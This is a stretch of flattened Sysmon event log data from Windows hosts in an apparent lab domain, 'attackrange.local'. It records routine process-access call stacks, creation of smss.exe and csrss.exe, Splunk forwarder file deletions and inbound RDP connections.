09:21:42.935{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055103Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.935{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055102Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.935{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055101Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.935{5EBD8912-8D26-6151-8400-00000000FD01}660912C:\Windows\System32\smss.exe{5EBD8912-8D26-6151-8500-00000000FD01}2760C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\SYSTEM32\ntdll.dll+8c63e|C:\Windows\SYSTEM32\ntdll.dll+8c3e9|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5178f 154100x80000000000000001055100Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.946{5EBD8912-8D26-6151-8500-00000000FD01}2760C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e72SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{5EBD8912-8D26-6151-8400-00000000FD01}660C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000001d4 0000007c 10341000x80000000000000001055099Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.935{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055098Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.935{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055097Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.935{5EBD8912-8CA0-6151-0200-00000000FD01}324332C:\Windows\System32\smss.exe{5EBD8912-8D26-6151-8400-00000000FD01}660C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6cc4|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055096Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.935{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055095Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.935{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055094Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.935{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055093Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.935{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055092Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.935{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055091Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.935{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055090Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.935{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055089Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.935{5EBD8912-8CA0-6151-0200-00000000FD01}324956C:\Windows\System32\smss.exe{5EBD8912-8D26-6151-8400-00000000FD01}660C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\SYSTEM32\ntdll.dll+8c63e|C:\Windows\SYSTEM32\ntdll.dll+8c3e9|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+3c31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5178f 154100x80000000000000001055088Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.936{5EBD8912-8D26-6151-8400-00000000FD01}660C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000001d4 0000007c C:\Windows\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e72SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{5EBD8912-8CA0-6151-0200-00000000FD01}324C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 23542300x80000000000000001055087Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.743{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=040F5F073E953EB49B65A749ECB7F8B5,SHA256=3A35C88196913BC41EDF69B5D58120628133EE823D5BFB350627E70E719E9D76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055086Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.728{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=24E9550188D75386BF71D51730608DA7,SHA256=D182BC083FD69CF3A2F854BF382F5807A1B05C9CC855ABE2B514210CA8E8D8D6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055085Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:41.559{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59239-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001055084Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:41.186{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54201-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001055083Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:41.147{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse93.104.91.170ppp-93-104-91-170.dynamic.mnet-online.de51131-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001055082Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.212{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35298C34B0A32006C49194F50F0F71BC,SHA256=219A6AD6D32BD5A005DA71F4B1DDA0E91FA726BD65E821F9471DB6FC31B76257,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980872Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:43.181{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A14F9EDC9C6556E43E950BB3DE9C2B86,SHA256=EF0F15D3B74BA3BFCD843CCE17D2A7DBA6F7A83CBDD15E4F14A148B2F551DB46,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055208Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.951{5EBD8912-8D27-6151-8700-00000000FD01}37244020C:\Windows\system32\LogonUI.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\logoncontroller.dll+2eef5|C:\Windows\System32\RPCRT4.dll+48674|C:\Windows\System32\RPCRT4.dll+31850|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055207Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.951{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055206Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.951{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001055205Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:42.516{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59372-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001055204Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.701{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8800-00000000FD01}812C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055203Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.701{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8800-00000000FD01}812C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055202Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.701{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8800-00000000FD01}812C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055201Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 